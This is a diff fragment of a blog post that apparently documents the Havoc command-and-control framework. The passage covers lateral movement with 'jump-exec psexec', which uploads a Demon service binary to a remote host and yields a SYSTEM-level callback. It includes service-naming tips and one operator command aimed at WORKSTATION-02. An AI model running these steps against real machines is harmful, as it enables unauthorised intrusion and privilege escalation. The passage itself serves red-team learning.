pikaroot/pikaroot.github.io/_blogs/2023-02-25-HAVOC_Framework.md

   psexec                    executes specified service on target host
 ```

-Create another listener with SMB protocol selected and generate a service binary ( `Windows Service EXE` ) using that listener.
+Create another listener with SMB protocol selected and generate a new service binary ( `Windows Service EXE` ) using that listener.

 The `jump-exec psexec` command work by uploading a service binary to the target system, then creating and starting a Windows service to execute that binary.
-Similar as Cobalt Strike, Demons executed this way run as `SYSTEM` instead of user accounts.
+Similar as Cobalt Strike, Demons executed using this method will always return a demon callback under the context of `SYSTEM` instead of user accounts due to the involvement of Service Control Manager.
 After launching the command, Havoc will start the service executable automatically in the remote target.

-> Take note that, the `[Service Name]` in the `jump-exec psexec` command must insert **DemonSvc** as the Service Name when generating the service binary is `DemonSvc` by default.
-Additionally, do not change the default name of the service binary as it might not work with some reasons.
+> Take note that, the `[Service Name]` from the `jump-exec psexec` command must be **DemonSvc** when generating the service binary, as it is the default name.
+Additionally, do not change the default name of the service binary as it might not work for some unknown reasons.

 ```
 05/03/2023 23:20:57 [5pider] Demon » jump-exec psexec WORKSTATION-02 DemonSvc /home/havoc/Desktop/Payloads/demon_svc.exe